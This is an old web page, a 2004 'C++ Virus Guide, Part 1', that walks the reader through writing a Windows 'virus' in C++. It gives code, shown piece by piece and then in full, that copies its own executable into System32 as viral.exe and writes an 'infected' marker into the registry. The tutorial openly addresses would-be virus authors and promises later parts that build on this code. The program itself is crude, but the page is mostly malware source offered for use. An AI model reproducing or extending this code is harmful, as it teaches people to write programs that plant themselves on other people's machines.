<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head>
<title>C++ Virus Guide by Retro</title>
<meta name="GENERATOR" content="Namo WebEditor v2.00">
</head>
<body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">

<p align="center">&nbsp; 
<div align="center"><table border="0" width="60%">
<tr>
<td width="971"><p align="center"><font face="Verdana"><b>C++ Virus Guide :: Part 1</b></font></td>
</tr></table></div>
<p align="center"><font face="Verdana" size="2"><hr width="60%" noshade></font> 
<div align="center"><table border="0" width="60%">
<tr>
<td width="576"><p><font face="Verdana" size="2">When I starting learning about viruses, I found that there was so many tutorials in 
ASM. This laugage is very popular with virus authours, but I perfer to use C++ which 
I'm going to show you now. In the first part I'm going to show have to copy a simple 
virus program in to a directory and then write in the registry to show that the virus 
has infected in the computer.&nbsp;</font></p>
<p><font face="Verdana" size="2">NOTE: All code in this has been used with MVSC++6 and MVSC++ .NET</font></p>
<p><font face="Verdana" size="2" color="blue">#include</font><font face="Verdana" size="2"> windows.h </font><font face="Verdana" size="2" color="green"><br clear="all">
</font><font face="Verdana" size="2" color="blue">#include</font><font face="Verdana" size="2"> string.h</font></p>
<p><font face="Verdana" size="2">These are the standard header files for the virus, and windows file is used with any 
program which you write for windows. &nbsp;Also the string file is needed as we need this 
file to use the strcat function.</font></p>
<p><font face="Verdana" size="2">Next we need to set a varible which is needed.<br clear="all">
The varible will store the path to the windows directory (C:\Windows), at will store up 
to 256 characters and this can be written as the following</font></p>
<p><font face="Verdana" size="2" color="blue">char</font><font face="Verdana" size="2"> windir[MAX_PATH];</font></p>
<p><font face="Verdana" size="2">We now need to start the main function, and this will be where you store the rest of 
the code.It is the entry-point function called by the system as the initial entry point 
for a Windows-based application. </font></p>
<p><font face="Verdana" size="2" color="blue">int</font><font face="Verdana" size="2"> APIENTRY WinMain(HINSTANCE hInstance,<br clear="all">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HINSTANCE hPrevInstance,<br clear="all">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LPSTR lpCmdLine,<br clear="all">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font face="Verdana" size="2" color="blue">int</font><font face="Verdana" size="2"> nCmdShow)</font></p>
<p><font face="Verdana" size="2">{&nbsp;</font></p>
<p><font face="Verdana" size="2">This is the standard opening funtion for any windows program like<br clear="all">
<br clear="all">
Private main() in VB<br clear="all">
.START in ASM<br clear="all">
void main() in C<br clear="all">
begin in pascal</font></p>
<p><font face="Verdana" size="2">and so on and so forth.&nbsp;</font></p>
<p><font face="Verdana" size="2"><hr noshade>&nbsp;</font></p>
<p><font face="Verdana" size="2">Ok then now we can set some more varibles in the main function. The first varible will 
store the pathname of the next varible will store the pathname of where you virus is 
at the time, the other will be used for the handle of the key, which will be entered 
into the registry.</font></p>
<p><font face="Verdana" size="2" color="blue">char</font><font face="Verdana" size="2"> pathname[256];<br clear="all">
HKEY hKey;</font></p>
<p><font face="Verdana" size="2">Right ok, its all the varibles done. We can get on with the real coding. &nbsp;Like I said 
before this program will store and the pathname of the windows directory and store it 
to the varible 'windir'. &nbsp;Too get the windows path we can use the code below which 
will save it to the windir varible.</font></p>
<p><font face="Verdana" size="2">GetWindowsDirectory(windir, </font><font face="Verdana" size="2" color="blue">sizeof</font><font face="Verdana" size="2">(windir));</font></p>
<p><font face="Verdana" size="2">Now we got the pathname of the windows directory the next thing we have to do is 
find the name and path of the program itself</font></p>
<p><font face="Verdana" size="2">HMODULE hMe = GetModuleHandle(NULL);<br clear="all">
DWORD nRet = GetModuleFileName(hMe, pathname, 256);</font></p>
<p><font face="Verdana" size="2">Now then, so we have the windows directory, program name and the path of it. Now 
what we need to do is to prepare the target path which will be 
C:\Windows\System32\ so we as before we found the windows directory which is 
stored in the varible windir and prepare the rest by adding it on to the end, plus what 
what you want to come in the outcome of the file to be, which I have named 
viral.exe.</font></p>
<p><font face="Verdana" size="2">Be using the CopyFile command, it'll copy the program itself "pathname" to where you 
want it "windir"</font></p>
<p><font face="Verdana" size="2">strcat(windir, "\\System32\\viral.exe");<br clear="all">
CopyFile(pathname,windir,0);&nbsp;</font></p>
<p><font face="Verdana" size="2"><hr noshade>&nbsp;</font></p>
<p><font face="Verdana" size="2"><b>Using the&nbsp;Registry</b></font></p>
<p><font face="Verdana" size="2">I'm only going to show you a simple way of using the registry but I will be building on 
it on future parts to come. </font></p>
<p><font face="Verdana" size="2">First thing is to set whatever value to want. It will store the value into "reg" with up 
to 10 char, unless you change it.</font></p>
<p><font face="Verdana" size="2" color="blue">unsigned char</font><font face="Verdana" size="2"> reg[10] = "infected";</font></p>
<p><font face="Verdana" size="2">Now create the key</font></p>
<p><font face="Verdana" size="2">RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);</font></p>
<p><font face="Verdana" size="2">And set the value to it</font></p>
<p><font face="Verdana" size="2">RegSetValueEx(hKey,"virus",0,REG_SZ,reg,</font><font face="Verdana" size="2" color="blue">sizeof</font><font face="Verdana" size="2">(reg));</font></p>
<p><font face="Verdana" size="2">Close the key we have opened and end the WinMain function</font></p>
<p><font face="Verdana" size="2">RegCloseKey(hKey);</font></p>
<p><font face="Verdana" size="2">}</font></p>
<p><font face="Verdana" size="2"><b><hr noshade>&nbsp;Complete Code</b></font></p>
<p><font face="Verdana" size="2" color="blue">#include</font><font face="Verdana" size="2"> windows.h<br clear="all">
</font><font face="Verdana" size="2" color="blue">#include</font><font face="Verdana" size="2"> string.h</font></p>
<p><font face="Verdana" size="2" color="blue">char</font><font face="Verdana" size="2"> windir[MAX_PATH];</font></p>
<p><font face="Verdana" size="2" color="blue">int</font><font face="Verdana" size="2"> APIENTRY WinMain(HINSTANCE hInstance,<br clear="all">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HINSTANCE hPrevInstance,<br clear="all">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LPSTR lpCmdLine,<br clear="all">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font face="Verdana" size="2" color="blue">int</font><font face="Verdana" size="2"> nCmdShow)<br clear="all">
{</font></p>
<p><font face="Verdana" size="2" color="blue">char</font><font face="Verdana" size="2"> pathname[256];<br clear="all">
HKEY hKey;<br clear="all"></font></p>
<p><font face="Verdana" size="2">GetWindowsDirectory(windir, </font><font face="Verdana" size="2" color="blue">sizeof</font><font face="Verdana" size="2">(windir));<br clear="all">
HMODULE hMe = GetModuleHandle(NULL);<br clear="all">
DWORD nRet = GetModuleFileName(hMe, pathname, 256);</font></p>
<p><font face="Verdana" size="2">strcat(windir, "\\System32\\viral.exe");<br clear="all">
CopyFile(pathname,windir,0);<br clear="all"></font></p>
<p><font face="Verdana" size="2" color="blue">unsigned char</font><font face="Verdana" size="2"> reg[10] = "infected";</font></p>
<p><font face="Verdana" size="2">RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);<br clear="all">
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,</font><font face="Verdana" size="2" color="blue">sizeof</font><font face="Verdana" size="2">(reg));<br clear="all">
RegCloseKey(hKey);</font></p>
<p><font face="Verdana" size="2">}</font></td>
</tr></table></div>
<p align="center"><font face="Verdana" size="2"><hr width="60%" noshade></font> 
<div align="center"><table border="0" width="60%">
<tr>
<td width="971"><p align="center">&nbsp;<font face="Verdana" size="2">22nd March 2004</font></td>
</tr><tr>
<td width="971"><p align="center"><font face="Verdana" size="2">by Retro<br clear="all">
http://retro.host.sk&nbsp;</font></td>
</tr></table></div>
<p align="center"><font face="Verdana" size="2">&nbsp;</font></p>
</body>
</html>